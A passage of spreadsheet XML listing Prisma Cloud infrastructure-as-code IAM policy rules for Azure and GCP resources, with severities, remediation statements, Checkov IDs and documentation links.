      <c r="F1077" t="inlineStr"/>
      <c r="G1077" t="b">
        <v>1</v>
      </c>
      <c r="H10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7" t="inlineStr">
        <is>
          <t>azure</t>
        </is>
      </c>
      <c r="J1077" t="inlineStr">
        <is>
          <t>IaC:IAM:azure-kubernetes</t>
        </is>
      </c>
      <c r="K1077" t="inlineStr">
        <is>
          <t>Azure Kubernetes Service (AKS) local admin account is enabled</t>
        </is>
      </c>
      <c r="L1077" t="inlineStr"/>
      <c r="M1077" t="inlineStr">
        <is>
          <t>low</t>
        </is>
      </c>
      <c r="N1077" t="inlineStr">
        <is>
          <t>Prisma Cloud</t>
        </is>
      </c>
      <c r="O1077" t="inlineStr">
        <is>
          <t>config</t>
        </is>
      </c>
      <c r="P1077" t="inlineStr">
        <is>
          <t>build</t>
        </is>
      </c>
      <c r="Q1077" t="inlineStr"/>
      <c r="R1077" t="inlineStr"/>
      <c r="S1077" t="inlineStr"/>
      <c r="T1077" t="b">
        <v>0</v>
      </c>
      <c r="U1077" t="inlineStr">
        <is>
          <t>exposure</t>
        </is>
      </c>
      <c r="V1077" t="inlineStr">
        <is>
          <t>IaC:IAM:azure-kubernetes-cluster</t>
        </is>
      </c>
      <c r="W1077" t="inlineStr">
        <is>
          <t>Ensure AKS local admin account is disabled</t>
        </is>
      </c>
      <c r="X1077" t="inlineStr">
        <is>
          <t>Refer the documentation for more details,
https://docs.prismacloud.io/en/enterprise-edition/policy-reference/azure-policies/azure-iam-policies/ensure-azure-kubernetes-service-aks-local-admin-account-is-disabled</t>
        </is>
      </c>
      <c r="Y1077" t="inlineStr"/>
      <c r="Z1077" t="inlineStr">
        <is>
          <t>{"category":"IAM","resourceTypes":["azurerm_kubernetes_cluster"]}</t>
        </is>
      </c>
      <c r="AA1077" t="inlineStr">
        <is>
          <t>Prisma Cloud System Admin</t>
        </is>
      </c>
      <c r="AB1077" t="inlineStr">
        <is>
          <t>2024-11-11 04:28:29</t>
        </is>
      </c>
      <c r="AC1077" t="inlineStr">
        <is>
          <t>CKV_AZURE_141</t>
        </is>
      </c>
      <c r="AD1077" t="b">
        <v>1</v>
      </c>
      <c r="AE1077" t="inlineStr">
        <is>
          <t>redlock_default</t>
        </is>
      </c>
      <c r="AF1077" t="inlineStr">
        <is>
          <t>risk</t>
        </is>
      </c>
      <c r="AG10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7" t="inlineStr">
        <is>
          <t>56b6a6d8-283f-4847-9fbc-7b93987117c4</t>
        </is>
      </c>
      <c r="AI1077" t="inlineStr"/>
      <c r="AJ1077" t="inlineStr">
        <is>
          <t>false</t>
        </is>
      </c>
      <c r="AK1077" t="inlineStr">
        <is>
          <t>Discovered 2024/11/19/15:02</t>
        </is>
      </c>
    </row>
    <row r="1078">
      <c r="A1078" t="inlineStr"/>
      <c r="B1078" s="2" t="inlineStr">
        <is>
          <t>NO</t>
        </is>
      </c>
      <c r="C1078" s="2" t="inlineStr"/>
      <c r="D1078" t="inlineStr"/>
      <c r="E1078" t="inlineStr"/>
      <c r="F1078" t="inlineStr"/>
      <c r="G1078" t="b">
        <v>1</v>
      </c>
      <c r="H10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8" t="inlineStr">
        <is>
          <t>azure</t>
        </is>
      </c>
      <c r="J1078" t="inlineStr">
        <is>
          <t>IaC:IAM:azure-kusto</t>
        </is>
      </c>
      <c r="K1078" t="inlineStr">
        <is>
          <t>Data Explorer Not Using Managed Identities</t>
        </is>
      </c>
      <c r="L1078" t="inlineStr"/>
      <c r="M1078" t="inlineStr">
        <is>
          <t>medium</t>
        </is>
      </c>
      <c r="N1078" t="inlineStr">
        <is>
          <t>Prisma Cloud</t>
        </is>
      </c>
      <c r="O1078" t="inlineStr">
        <is>
          <t>config</t>
        </is>
      </c>
      <c r="P1078" t="inlineStr">
        <is>
          <t>build</t>
        </is>
      </c>
      <c r="Q1078" t="inlineStr"/>
      <c r="R1078" t="inlineStr"/>
      <c r="S1078" t="inlineStr"/>
      <c r="T1078" t="b">
        <v>0</v>
      </c>
      <c r="U1078" t="inlineStr">
        <is>
          <t>exposure</t>
        </is>
      </c>
      <c r="V1078" t="inlineStr">
        <is>
          <t>IaC:IAM:azure-kusto-cluster</t>
        </is>
      </c>
      <c r="W1078" t="inlineStr">
        <is>
          <t>Ensure that data explorer/Kusto uses managed identities to access Azure resources securely.</t>
        </is>
      </c>
      <c r="X1078" t="inlineStr">
        <is>
          <t>Refer the documentation for more details,
https://docs.paloaltonetworks.com/prisma/prisma-cloud/prisma-cloud-code-security-policy-reference/azure-policies/azure-iam-policies/azr-general-181</t>
        </is>
      </c>
      <c r="Y1078" t="inlineStr"/>
      <c r="Z1078" t="inlineStr">
        <is>
          <t>{"category":"IAM","resourceTypes":["azurerm_kusto_cluster"]}</t>
        </is>
      </c>
      <c r="AA1078" t="inlineStr">
        <is>
          <t>Prisma Cloud System Admin</t>
        </is>
      </c>
      <c r="AB1078" t="inlineStr">
        <is>
          <t>2024-11-11 04:28:29</t>
        </is>
      </c>
      <c r="AC1078" t="inlineStr">
        <is>
          <t>CKV_AZURE_181</t>
        </is>
      </c>
      <c r="AD1078" t="b">
        <v>1</v>
      </c>
      <c r="AE1078" t="inlineStr">
        <is>
          <t>redlock_default</t>
        </is>
      </c>
      <c r="AF1078" t="inlineStr">
        <is>
          <t>risk</t>
        </is>
      </c>
      <c r="AG10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8" t="inlineStr">
        <is>
          <t>67584702-ee18-449c-892d-ab8d3409876b</t>
        </is>
      </c>
      <c r="AI1078" t="inlineStr"/>
      <c r="AJ1078" t="inlineStr">
        <is>
          <t>false</t>
        </is>
      </c>
      <c r="AK1078" t="inlineStr">
        <is>
          <t>Discovered 2024/11/19/15:02</t>
        </is>
      </c>
    </row>
    <row r="1079">
      <c r="A1079" t="inlineStr"/>
      <c r="B1079" s="2" t="inlineStr">
        <is>
          <t>NO</t>
        </is>
      </c>
      <c r="C1079" s="2" t="inlineStr"/>
      <c r="D1079" t="inlineStr"/>
      <c r="E1079" t="inlineStr"/>
      <c r="F1079" t="inlineStr"/>
      <c r="G1079" t="b">
        <v>1</v>
      </c>
      <c r="H10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79" t="inlineStr">
        <is>
          <t>azure</t>
        </is>
      </c>
      <c r="J1079" t="inlineStr">
        <is>
          <t>IaC:IAM:azure-machine</t>
        </is>
      </c>
      <c r="K1079" t="inlineStr">
        <is>
          <t>Azure Machine Learning Compute Cluster Local Authentication is enabled</t>
        </is>
      </c>
      <c r="L1079" t="inlineStr"/>
      <c r="M1079" t="inlineStr">
        <is>
          <t>low</t>
        </is>
      </c>
      <c r="N1079" t="inlineStr">
        <is>
          <t>Prisma Cloud</t>
        </is>
      </c>
      <c r="O1079" t="inlineStr">
        <is>
          <t>config</t>
        </is>
      </c>
      <c r="P1079" t="inlineStr">
        <is>
          <t>build</t>
        </is>
      </c>
      <c r="Q1079" t="inlineStr"/>
      <c r="R1079" t="inlineStr"/>
      <c r="S1079" t="inlineStr"/>
      <c r="T1079" t="b">
        <v>0</v>
      </c>
      <c r="U1079" t="inlineStr">
        <is>
          <t>exposure</t>
        </is>
      </c>
      <c r="V1079" t="inlineStr">
        <is>
          <t>IaC:IAM:azure-machine-learning-compute-cluster</t>
        </is>
      </c>
      <c r="W1079" t="inlineStr">
        <is>
          <t>Ensure Machine Learning Compute Cluster Local Authentication is disabled</t>
        </is>
      </c>
      <c r="X1079" t="inlineStr">
        <is>
          <t>Refer the documentation for more details,
https://docs.prismacloud.io/en/enterprise-edition/policy-reference/azure-policies/azure-iam-policies/ensure-azure-machine-learning-compute-cluster-local-authentication-is-disabled</t>
        </is>
      </c>
      <c r="Y1079" t="inlineStr"/>
      <c r="Z1079" t="inlineStr">
        <is>
          <t>{"category":"IAM","resourceTypes":["azurerm_machine_learning_compute_cluster"]}</t>
        </is>
      </c>
      <c r="AA1079" t="inlineStr">
        <is>
          <t>Prisma Cloud System Admin</t>
        </is>
      </c>
      <c r="AB1079" t="inlineStr">
        <is>
          <t>2024-11-11 04:28:29</t>
        </is>
      </c>
      <c r="AC1079" t="inlineStr">
        <is>
          <t>CKV_AZURE_142</t>
        </is>
      </c>
      <c r="AD1079" t="b">
        <v>1</v>
      </c>
      <c r="AE1079" t="inlineStr">
        <is>
          <t>redlock_default</t>
        </is>
      </c>
      <c r="AF1079" t="inlineStr">
        <is>
          <t>risk</t>
        </is>
      </c>
      <c r="AG10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79" t="inlineStr">
        <is>
          <t>2ef37402-74b8-450f-887b-1fe6db41eb8e</t>
        </is>
      </c>
      <c r="AI1079" t="inlineStr"/>
      <c r="AJ1079" t="inlineStr">
        <is>
          <t>false</t>
        </is>
      </c>
      <c r="AK1079" t="inlineStr">
        <is>
          <t>Discovered 2024/11/19/15:02</t>
        </is>
      </c>
    </row>
    <row r="1080">
      <c r="A1080" t="inlineStr"/>
      <c r="B1080" s="2" t="inlineStr">
        <is>
          <t>NO</t>
        </is>
      </c>
      <c r="C1080" s="2" t="inlineStr"/>
      <c r="D1080" t="inlineStr"/>
      <c r="E1080" t="inlineStr"/>
      <c r="F1080" t="inlineStr"/>
      <c r="G1080" t="b">
        <v>1</v>
      </c>
      <c r="H10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0" t="inlineStr">
        <is>
          <t>azure</t>
        </is>
      </c>
      <c r="J1080" t="inlineStr">
        <is>
          <t>IaC:IAM:azure-role</t>
        </is>
      </c>
      <c r="K1080" t="inlineStr">
        <is>
          <t>Azure subscriptions with custom roles does not have minimum permissions</t>
        </is>
      </c>
      <c r="L1080" t="inlineStr"/>
      <c r="M1080" t="inlineStr">
        <is>
          <t>high</t>
        </is>
      </c>
      <c r="N1080" t="inlineStr">
        <is>
          <t>Prisma Cloud</t>
        </is>
      </c>
      <c r="O1080" t="inlineStr">
        <is>
          <t>config</t>
        </is>
      </c>
      <c r="P1080" t="inlineStr">
        <is>
          <t>build</t>
        </is>
      </c>
      <c r="Q1080" t="inlineStr"/>
      <c r="R1080" t="inlineStr"/>
      <c r="S1080" t="inlineStr">
        <is>
          <t>CRITICAL</t>
        </is>
      </c>
      <c r="T1080" t="b">
        <v>0</v>
      </c>
      <c r="U1080" t="inlineStr">
        <is>
          <t>exposure</t>
        </is>
      </c>
      <c r="V1080" t="inlineStr">
        <is>
          <t>IaC:IAM:azure-role-definition</t>
        </is>
      </c>
      <c r="W1080" t="inlineStr">
        <is>
          <t>Ensure that no custom subscription owner roles are created</t>
        </is>
      </c>
      <c r="X1080" t="inlineStr">
        <is>
          <t>Refer the documentation for more details,
https://docs.prismacloud.io/en/enterprise-edition/policy-reference/azure-policies/azure-iam-policies/do-not-create-custom-subscription-owner-roles</t>
        </is>
      </c>
      <c r="Y1080" t="inlineStr"/>
      <c r="Z1080" t="inlineStr">
        <is>
          <t>{"category":"IAM","resourceTypes":["azurerm_role_definition"]}</t>
        </is>
      </c>
      <c r="AA1080" t="inlineStr">
        <is>
          <t>Prisma Cloud System Admin</t>
        </is>
      </c>
      <c r="AB1080" t="inlineStr">
        <is>
          <t>2024-11-11 04:28:29</t>
        </is>
      </c>
      <c r="AC1080" t="inlineStr">
        <is>
          <t>CKV_AZURE_39</t>
        </is>
      </c>
      <c r="AD1080" t="b">
        <v>1</v>
      </c>
      <c r="AE1080" t="inlineStr">
        <is>
          <t>redlock_default</t>
        </is>
      </c>
      <c r="AF1080" t="inlineStr">
        <is>
          <t>risk</t>
        </is>
      </c>
      <c r="AG10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0" t="inlineStr">
        <is>
          <t>c5aef549-9d4c-4217-a45f-19a9de8b3502</t>
        </is>
      </c>
      <c r="AI1080" t="inlineStr"/>
      <c r="AJ1080" t="inlineStr">
        <is>
          <t>false</t>
        </is>
      </c>
      <c r="AK1080" t="inlineStr">
        <is>
          <t>Discovered 2024/11/19/15:02</t>
        </is>
      </c>
    </row>
    <row r="1081">
      <c r="A1081" t="inlineStr"/>
      <c r="B1081" s="2" t="inlineStr">
        <is>
          <t>NO</t>
        </is>
      </c>
      <c r="C1081" s="2" t="inlineStr"/>
      <c r="D1081" t="inlineStr"/>
      <c r="E1081" t="inlineStr"/>
      <c r="F1081" t="inlineStr"/>
      <c r="G1081" t="b">
        <v>1</v>
      </c>
      <c r="H10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1" t="inlineStr">
        <is>
          <t>azure</t>
        </is>
      </c>
      <c r="J1081" t="inlineStr">
        <is>
          <t>IaC:IAM:azure-search</t>
        </is>
      </c>
      <c r="K1081" t="inlineStr">
        <is>
          <t>Azure Cognitive Search Without Managed Identities</t>
        </is>
      </c>
      <c r="L1081" t="inlineStr"/>
      <c r="M1081" t="inlineStr">
        <is>
          <t>medium</t>
        </is>
      </c>
      <c r="N1081" t="inlineStr">
        <is>
          <t>Prisma Cloud</t>
        </is>
      </c>
      <c r="O1081" t="inlineStr">
        <is>
          <t>config</t>
        </is>
      </c>
      <c r="P1081" t="inlineStr">
        <is>
          <t>build</t>
        </is>
      </c>
      <c r="Q1081" t="inlineStr"/>
      <c r="R1081" t="inlineStr"/>
      <c r="S1081" t="inlineStr"/>
      <c r="T1081" t="b">
        <v>0</v>
      </c>
      <c r="U1081" t="inlineStr">
        <is>
          <t>exposure</t>
        </is>
      </c>
      <c r="V1081" t="inlineStr">
        <is>
          <t>IaC:IAM:azure-search-service</t>
        </is>
      </c>
      <c r="W1081" t="inlineStr">
        <is>
          <t>Ensure Azure Cognitive Search service uses managed identities to access Azure resources</t>
        </is>
      </c>
      <c r="X1081" t="inlineStr">
        <is>
          <t>Refer the documentation for more details,
https://docs.paloaltonetworks.com/prisma/prisma-cloud/prisma-cloud-code-security-policy-reference/azure-policies/azure-iam-policies/azr-general-207</t>
        </is>
      </c>
      <c r="Y1081" t="inlineStr"/>
      <c r="Z1081" t="inlineStr">
        <is>
          <t>{"category":"IAM","resourceTypes":["azurerm_search_service"]}</t>
        </is>
      </c>
      <c r="AA1081" t="inlineStr">
        <is>
          <t>Prisma Cloud System Admin</t>
        </is>
      </c>
      <c r="AB1081" t="inlineStr">
        <is>
          <t>2024-11-11 04:28:29</t>
        </is>
      </c>
      <c r="AC1081" t="inlineStr">
        <is>
          <t>CKV_AZURE_207</t>
        </is>
      </c>
      <c r="AD1081" t="b">
        <v>1</v>
      </c>
      <c r="AE1081" t="inlineStr">
        <is>
          <t>redlock_default</t>
        </is>
      </c>
      <c r="AF1081" t="inlineStr">
        <is>
          <t>risk</t>
        </is>
      </c>
      <c r="AG10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1" t="inlineStr">
        <is>
          <t>e192b9f5-bc2c-4d6b-aff6-22265b22fc1e</t>
        </is>
      </c>
      <c r="AI1081" t="inlineStr"/>
      <c r="AJ1081" t="inlineStr">
        <is>
          <t>false</t>
        </is>
      </c>
      <c r="AK1081" t="inlineStr">
        <is>
          <t>Discovered 2024/11/19/15:02</t>
        </is>
      </c>
    </row>
    <row r="1082">
      <c r="A1082" t="inlineStr"/>
      <c r="B1082" s="2" t="inlineStr">
        <is>
          <t>NO</t>
        </is>
      </c>
      <c r="C1082" s="2" t="inlineStr"/>
      <c r="D1082" t="inlineStr"/>
      <c r="E1082" t="inlineStr"/>
      <c r="F1082" t="inlineStr"/>
      <c r="G1082" t="b">
        <v>1</v>
      </c>
      <c r="H10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2" t="inlineStr">
        <is>
          <t>azure</t>
        </is>
      </c>
      <c r="J1082" t="inlineStr">
        <is>
          <t>IaC:IAM:azure-servicebus</t>
        </is>
      </c>
      <c r="K1082" t="inlineStr">
        <is>
          <t>Azure Service Bus Without Managed Identity Provider</t>
        </is>
      </c>
      <c r="L1082" t="inlineStr"/>
      <c r="M1082" t="inlineStr">
        <is>
          <t>medium</t>
        </is>
      </c>
      <c r="N1082" t="inlineStr">
        <is>
          <t>Prisma Cloud</t>
        </is>
      </c>
      <c r="O1082" t="inlineStr">
        <is>
          <t>config</t>
        </is>
      </c>
      <c r="P1082" t="inlineStr">
        <is>
          <t>build</t>
        </is>
      </c>
      <c r="Q1082" t="inlineStr"/>
      <c r="R1082" t="inlineStr"/>
      <c r="S1082" t="inlineStr"/>
      <c r="T1082" t="b">
        <v>0</v>
      </c>
      <c r="U1082" t="inlineStr">
        <is>
          <t>exposure</t>
        </is>
      </c>
      <c r="V1082" t="inlineStr">
        <is>
          <t>IaC:IAM:azure-servicebus-namespace</t>
        </is>
      </c>
      <c r="W1082" t="inlineStr">
        <is>
          <t>Ensure that Managed identity provider is enabled for Azure Service Bus</t>
        </is>
      </c>
      <c r="X1082" t="inlineStr">
        <is>
          <t>Refer the documentation for more details,
https://docs.paloaltonetworks.com/prisma/prisma-cloud/prisma-cloud-code-security-policy-reference/azure-policies/azure-iam-policies/azr-general-202</t>
        </is>
      </c>
      <c r="Y1082" t="inlineStr"/>
      <c r="Z1082" t="inlineStr">
        <is>
          <t>{"category":"IAM","resourceTypes":["azurerm_servicebus_namespace"]}</t>
        </is>
      </c>
      <c r="AA1082" t="inlineStr">
        <is>
          <t>Prisma Cloud System Admin</t>
        </is>
      </c>
      <c r="AB1082" t="inlineStr">
        <is>
          <t>2024-11-11 04:28:29</t>
        </is>
      </c>
      <c r="AC1082" t="inlineStr">
        <is>
          <t>CKV_AZURE_202</t>
        </is>
      </c>
      <c r="AD1082" t="b">
        <v>1</v>
      </c>
      <c r="AE1082" t="inlineStr">
        <is>
          <t>redlock_default</t>
        </is>
      </c>
      <c r="AF1082" t="inlineStr">
        <is>
          <t>risk</t>
        </is>
      </c>
      <c r="AG10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2" t="inlineStr">
        <is>
          <t>fac9bc8b-785e-4c70-b3cc-03fa0efe158d</t>
        </is>
      </c>
      <c r="AI1082" t="inlineStr"/>
      <c r="AJ1082" t="inlineStr">
        <is>
          <t>false</t>
        </is>
      </c>
      <c r="AK1082" t="inlineStr">
        <is>
          <t>Discovered 2024/11/19/15:02</t>
        </is>
      </c>
    </row>
    <row r="1083">
      <c r="A1083" t="inlineStr"/>
      <c r="B1083" s="2" t="inlineStr">
        <is>
          <t>NO</t>
        </is>
      </c>
      <c r="C1083" s="2" t="inlineStr"/>
      <c r="D1083" t="inlineStr"/>
      <c r="E1083" t="inlineStr"/>
      <c r="F1083" t="inlineStr"/>
      <c r="G1083" t="b">
        <v>1</v>
      </c>
      <c r="H10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3" t="inlineStr">
        <is>
          <t>azure</t>
        </is>
      </c>
      <c r="J1083" t="inlineStr">
        <is>
          <t>IaC:IAM:azure-servicebus</t>
        </is>
      </c>
      <c r="K1083" t="inlineStr">
        <is>
          <t>Azure Service Bus with Local Authentication Enabled</t>
        </is>
      </c>
      <c r="L1083" t="inlineStr"/>
      <c r="M1083" t="inlineStr">
        <is>
          <t>low</t>
        </is>
      </c>
      <c r="N1083" t="inlineStr">
        <is>
          <t>Prisma Cloud</t>
        </is>
      </c>
      <c r="O1083" t="inlineStr">
        <is>
          <t>config</t>
        </is>
      </c>
      <c r="P1083" t="inlineStr">
        <is>
          <t>build</t>
        </is>
      </c>
      <c r="Q1083" t="inlineStr"/>
      <c r="R1083" t="inlineStr"/>
      <c r="S1083" t="inlineStr"/>
      <c r="T1083" t="b">
        <v>0</v>
      </c>
      <c r="U1083" t="inlineStr">
        <is>
          <t>exposure</t>
        </is>
      </c>
      <c r="V1083" t="inlineStr">
        <is>
          <t>IaC:IAM:azure-servicebus-namespace</t>
        </is>
      </c>
      <c r="W1083" t="inlineStr">
        <is>
          <t>Ensure Azure Service Bus Local Authentication is disabled</t>
        </is>
      </c>
      <c r="X1083" t="inlineStr">
        <is>
          <t>Refer the documentation for more details,
https://docs.paloaltonetworks.com/prisma/prisma-cloud/prisma-cloud-code-security-policy-reference/azure-policies/azure-iam-policies/azr-general-203</t>
        </is>
      </c>
      <c r="Y1083" t="inlineStr"/>
      <c r="Z1083" t="inlineStr">
        <is>
          <t>{"category":"IAM","resourceTypes":["azurerm_servicebus_namespace"]}</t>
        </is>
      </c>
      <c r="AA1083" t="inlineStr">
        <is>
          <t>Prisma Cloud System Admin</t>
        </is>
      </c>
      <c r="AB1083" t="inlineStr">
        <is>
          <t>2024-11-11 04:28:29</t>
        </is>
      </c>
      <c r="AC1083" t="inlineStr">
        <is>
          <t>CKV_AZURE_203</t>
        </is>
      </c>
      <c r="AD1083" t="b">
        <v>1</v>
      </c>
      <c r="AE1083" t="inlineStr">
        <is>
          <t>redlock_default</t>
        </is>
      </c>
      <c r="AF1083" t="inlineStr">
        <is>
          <t>risk</t>
        </is>
      </c>
      <c r="AG10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3" t="inlineStr">
        <is>
          <t>06857b33-0c83-4769-8f92-dad77fbd6d76</t>
        </is>
      </c>
      <c r="AI1083" t="inlineStr"/>
      <c r="AJ1083" t="inlineStr">
        <is>
          <t>false</t>
        </is>
      </c>
      <c r="AK1083" t="inlineStr">
        <is>
          <t>Discovered 2024/11/19/15:02</t>
        </is>
      </c>
    </row>
    <row r="1084">
      <c r="A1084" t="inlineStr"/>
      <c r="B1084" s="2" t="inlineStr">
        <is>
          <t>NO</t>
        </is>
      </c>
      <c r="C1084" s="2" t="inlineStr"/>
      <c r="D1084" t="inlineStr"/>
      <c r="E1084" t="inlineStr"/>
      <c r="F1084" t="inlineStr"/>
      <c r="G1084" t="b">
        <v>1</v>
      </c>
      <c r="H10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4" t="inlineStr">
        <is>
          <t>azure</t>
        </is>
      </c>
      <c r="J1084" t="inlineStr">
        <is>
          <t>IaC:IAM:azure-storage</t>
        </is>
      </c>
      <c r="K1084" t="inlineStr">
        <is>
          <t>Anonymous blob access configured in Azure storage account</t>
        </is>
      </c>
      <c r="L1084" t="inlineStr"/>
      <c r="M1084" t="inlineStr">
        <is>
          <t>medium</t>
        </is>
      </c>
      <c r="N1084" t="inlineStr">
        <is>
          <t>Prisma Cloud</t>
        </is>
      </c>
      <c r="O1084" t="inlineStr">
        <is>
          <t>config</t>
        </is>
      </c>
      <c r="P1084" t="inlineStr">
        <is>
          <t>build</t>
        </is>
      </c>
      <c r="Q1084" t="inlineStr"/>
      <c r="R1084" t="inlineStr"/>
      <c r="S1084" t="inlineStr"/>
      <c r="T1084" t="b">
        <v>0</v>
      </c>
      <c r="U1084" t="inlineStr">
        <is>
          <t>exposure</t>
        </is>
      </c>
      <c r="V1084" t="inlineStr">
        <is>
          <t>IaC:IAM:azure-storage-account</t>
        </is>
      </c>
      <c r="W1084" t="inlineStr">
        <is>
          <t>Ensure storage account is configured without blob anonymous access</t>
        </is>
      </c>
      <c r="X1084" t="inlineStr">
        <is>
          <t>Refer the documentation for more details,
https://docs.prismacloud.io/en/enterprise-edition/policy-reference/azure-policies/azure-iam-policies/bc-azure-2-47</t>
        </is>
      </c>
      <c r="Y1084" t="inlineStr"/>
      <c r="Z1084" t="inlineStr">
        <is>
          <t>{"category":"IAM","resourceTypes":["azurerm_storage_account"]}</t>
        </is>
      </c>
      <c r="AA1084" t="inlineStr">
        <is>
          <t>Prisma Cloud System Admin</t>
        </is>
      </c>
      <c r="AB1084" t="inlineStr">
        <is>
          <t>2024-11-11 04:28:29</t>
        </is>
      </c>
      <c r="AC1084" t="inlineStr">
        <is>
          <t>CKV2_AZURE_47</t>
        </is>
      </c>
      <c r="AD1084" t="b">
        <v>1</v>
      </c>
      <c r="AE1084" t="inlineStr">
        <is>
          <t>redlock_default</t>
        </is>
      </c>
      <c r="AF1084" t="inlineStr">
        <is>
          <t>risk</t>
        </is>
      </c>
      <c r="AG10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4" t="inlineStr">
        <is>
          <t>911ed536-2b76-4cd3-b6a9-b9301e600046</t>
        </is>
      </c>
      <c r="AI1084" t="inlineStr"/>
      <c r="AJ1084" t="inlineStr">
        <is>
          <t>false</t>
        </is>
      </c>
      <c r="AK1084" t="inlineStr">
        <is>
          <t>Discovered 2024/11/19/15:02</t>
        </is>
      </c>
    </row>
    <row r="1085">
      <c r="A1085" t="inlineStr"/>
      <c r="B1085" s="2" t="inlineStr">
        <is>
          <t>NO</t>
        </is>
      </c>
      <c r="C1085" s="2" t="inlineStr"/>
      <c r="D1085" t="inlineStr"/>
      <c r="E1085" t="inlineStr"/>
      <c r="F1085" t="inlineStr"/>
      <c r="G1085" t="b">
        <v>1</v>
      </c>
      <c r="H10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5" t="inlineStr">
        <is>
          <t>azure</t>
        </is>
      </c>
      <c r="J1085" t="inlineStr">
        <is>
          <t>IaC:IAM:azure-web</t>
        </is>
      </c>
      <c r="K1085" t="inlineStr">
        <is>
          <t>Web PubSub Without Managed Identities</t>
        </is>
      </c>
      <c r="L1085" t="inlineStr"/>
      <c r="M1085" t="inlineStr">
        <is>
          <t>medium</t>
        </is>
      </c>
      <c r="N1085" t="inlineStr">
        <is>
          <t>Prisma Cloud</t>
        </is>
      </c>
      <c r="O1085" t="inlineStr">
        <is>
          <t>config</t>
        </is>
      </c>
      <c r="P1085" t="inlineStr">
        <is>
          <t>build</t>
        </is>
      </c>
      <c r="Q1085" t="inlineStr"/>
      <c r="R1085" t="inlineStr"/>
      <c r="S1085" t="inlineStr"/>
      <c r="T1085" t="b">
        <v>0</v>
      </c>
      <c r="U1085" t="inlineStr">
        <is>
          <t>exposure</t>
        </is>
      </c>
      <c r="V1085" t="inlineStr">
        <is>
          <t>IaC:IAM:azure-web-pubsub</t>
        </is>
      </c>
      <c r="W1085" t="inlineStr">
        <is>
          <t>Ensure Web PubSub uses managed identities to access Azure resources</t>
        </is>
      </c>
      <c r="X1085" t="inlineStr">
        <is>
          <t>Refer the documentation for more details,
https://docs.paloaltonetworks.com/prisma/prisma-cloud/prisma-cloud-code-security-policy-reference/azure-policies/azure-iam-policies/azr-general-176</t>
        </is>
      </c>
      <c r="Y1085" t="inlineStr"/>
      <c r="Z1085" t="inlineStr">
        <is>
          <t>{"category":"IAM","resourceTypes":["azurerm_web_pubsub"]}</t>
        </is>
      </c>
      <c r="AA1085" t="inlineStr">
        <is>
          <t>Prisma Cloud System Admin</t>
        </is>
      </c>
      <c r="AB1085" t="inlineStr">
        <is>
          <t>2024-11-11 04:28:29</t>
        </is>
      </c>
      <c r="AC1085" t="inlineStr">
        <is>
          <t>CKV_AZURE_176</t>
        </is>
      </c>
      <c r="AD1085" t="b">
        <v>1</v>
      </c>
      <c r="AE1085" t="inlineStr">
        <is>
          <t>redlock_default</t>
        </is>
      </c>
      <c r="AF1085" t="inlineStr">
        <is>
          <t>risk</t>
        </is>
      </c>
      <c r="AG10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5" t="inlineStr">
        <is>
          <t>0327b3ff-cca3-40dc-89ac-77fd32c4ec3b</t>
        </is>
      </c>
      <c r="AI1085" t="inlineStr"/>
      <c r="AJ1085" t="inlineStr">
        <is>
          <t>false</t>
        </is>
      </c>
      <c r="AK1085" t="inlineStr">
        <is>
          <t>Discovered 2024/11/19/15:02</t>
        </is>
      </c>
    </row>
    <row r="1086">
      <c r="A1086" t="inlineStr"/>
      <c r="B1086" s="2" t="inlineStr">
        <is>
          <t>NO</t>
        </is>
      </c>
      <c r="C1086" s="2" t="inlineStr"/>
      <c r="D1086" t="inlineStr"/>
      <c r="E1086" t="inlineStr"/>
      <c r="F1086" t="inlineStr"/>
      <c r="G1086" t="b">
        <v>1</v>
      </c>
      <c r="H10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6" t="inlineStr">
        <is>
          <t>gcp</t>
        </is>
      </c>
      <c r="J1086" t="inlineStr">
        <is>
          <t>IaC:IAM:google-folder</t>
        </is>
      </c>
      <c r="K1086" t="inlineStr">
        <is>
          <t>Roles impersonate or manage Service Accounts used at folder level</t>
        </is>
      </c>
      <c r="L1086" t="inlineStr"/>
      <c r="M1086" t="inlineStr">
        <is>
          <t>high</t>
        </is>
      </c>
      <c r="N1086" t="inlineStr">
        <is>
          <t>Prisma Cloud</t>
        </is>
      </c>
      <c r="O1086" t="inlineStr">
        <is>
          <t>config</t>
        </is>
      </c>
      <c r="P1086" t="inlineStr">
        <is>
          <t>build</t>
        </is>
      </c>
      <c r="Q1086" t="inlineStr"/>
      <c r="R1086" t="inlineStr"/>
      <c r="S1086" t="inlineStr">
        <is>
          <t>CRITICAL</t>
        </is>
      </c>
      <c r="T1086" t="b">
        <v>0</v>
      </c>
      <c r="U1086" t="inlineStr">
        <is>
          <t>exposure</t>
        </is>
      </c>
      <c r="V1086" t="inlineStr">
        <is>
          <t>IaC:IAM:google-folder-iam-member,google-folder-iam-binding</t>
        </is>
      </c>
      <c r="W1086" t="inlineStr">
        <is>
          <t>Ensure no roles that enable to impersonate and manage all service accounts are used at a folder level</t>
        </is>
      </c>
      <c r="X1086" t="inlineStr">
        <is>
          <t>Refer the documentation for more details,
https://docs.prismacloud.io/en/enterprise-edition/policy-reference/google-cloud-policies/google-cloud-iam-policies/bc-gcp-iam-5</t>
        </is>
      </c>
      <c r="Y1086" t="inlineStr"/>
      <c r="Z1086" t="inlineStr">
        <is>
          <t>{"category":"IAM","resourceTypes":["google_folder_iam_member","google_folder_iam_binding"]}</t>
        </is>
      </c>
      <c r="AA1086" t="inlineStr">
        <is>
          <t>Prisma Cloud System Admin</t>
        </is>
      </c>
      <c r="AB1086" t="inlineStr">
        <is>
          <t>2024-11-11 04:28:29</t>
        </is>
      </c>
      <c r="AC1086" t="inlineStr">
        <is>
          <t>CKV_GCP_44</t>
        </is>
      </c>
      <c r="AD1086" t="b">
        <v>1</v>
      </c>
      <c r="AE1086" t="inlineStr">
        <is>
          <t>redlock_default</t>
        </is>
      </c>
      <c r="AF1086" t="inlineStr">
        <is>
          <t>risk</t>
        </is>
      </c>
      <c r="AG10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6" t="inlineStr">
        <is>
          <t>4adc9593-2094-47a4-8810-c359d3cfd88d</t>
        </is>
      </c>
      <c r="AI1086" t="inlineStr"/>
      <c r="AJ1086" t="inlineStr">
        <is>
          <t>false</t>
        </is>
      </c>
      <c r="AK1086" t="inlineStr">
        <is>
          <t>Discovered 2024/11/19/15:03</t>
        </is>
      </c>
    </row>
    <row r="1087">
      <c r="A1087" t="inlineStr">
        <is>
          <t>PCS SWAT Standards (SWATS) 1.0 - DO NOT TOUCH</t>
        </is>
      </c>
      <c r="B1087" s="2" t="inlineStr">
        <is>
          <t>NO</t>
        </is>
      </c>
      <c r="C1087" s="2" t="inlineStr"/>
      <c r="D1087" t="inlineStr"/>
